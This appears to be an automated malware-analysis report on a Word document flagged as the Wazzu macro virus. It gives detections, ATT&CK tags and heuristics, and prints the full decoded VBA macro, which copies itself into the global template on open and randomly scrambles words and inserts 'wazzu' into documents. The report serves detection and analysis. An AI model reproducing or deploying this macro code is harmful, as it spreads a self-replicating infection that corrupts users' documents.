MALICIOUS
188
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample exhibits characteristics of legacy WordBasic macro viruses, including the presence of an AutoOpen macro and specific markers. The VBA code appears to obfuscate its functionality by manipulating document content and potentially preparing to execute a payload, as indicated by the ClamAV detections 'Doc.Trojan.Wazzu-47' and 'Doc.Trojan.Wazzu-11'. The macro's primary purpose seems to be related to payload delivery or execution, aligning with a spearphishing attachment attack vector.
Heuristics 4
-
ClamAV: Doc.Trojan.Wazzu-47 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Wazzu-47
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "autoOpen"
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1921 bytes |
SHA-256: ecfadf9cb00df27d2d2d1251e1b3013a786164040e854a0ca7ce76a197f29c77 |
|||
|
Detection
ClamAV:
Doc.Trojan.Wazzu-11
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "autoOpen"
Public Sub MAIN()
Dim fileMacro$
Dim globMacro$
Dim MacroFile$
On Error GoTo -1: On Error GoTo errCaught
WordBasic.FileSummaryInfo Update:=1
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSummaryInfo(False)
WordBasic.CurValues.FileSummaryInfo dlg
fileMacro$ = dlg.Directory + "\" + dlg.FileName + ":autoOpen"
globMacro$ = "Global:autoOpen"
MacroFile$ = UCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))
If MacroFile$ = "NORMAL.DOT" Then
WordBasic.MacroCopy globMacro$, fileMacro$
WordBasic.FileSaveAs Format:=1
Else
WordBasic.MacroCopy fileMacro$, globMacro$
End If
Payload
GoTo bye
errCaught:
bye:
On Error GoTo -1: On Error GoTo 0
End Sub
Private Sub Payload()
Dim i
Dim selWord$
For i = 1 To 3
If Rnd() < 0.2 Then
RndWord
WordBasic.SelectCurWord
selWord$ = WordBasic.[Selection$]()
WordBasic.DeleteWord
RndWord
WordBasic.Insert selWord$ + " "
End If
Next
If Rnd() < 0.25 Then
RndWord
WordBasic.Insert "wazzu "
WordBasic.StartOfDocument
End If
End Sub
Private Sub RndWord()
Dim wordNum
WordBasic.FileSummaryInfo Update:=1
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.DocumentStatistics(False)
WordBasic.CurValues.DocumentStatistics dlg
wordNum = WordBasic.Int(Rnd() * WordBasic.Val(dlg.Words))
WordBasic.StartOfDocument
WordBasic.WordRight wordNum
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.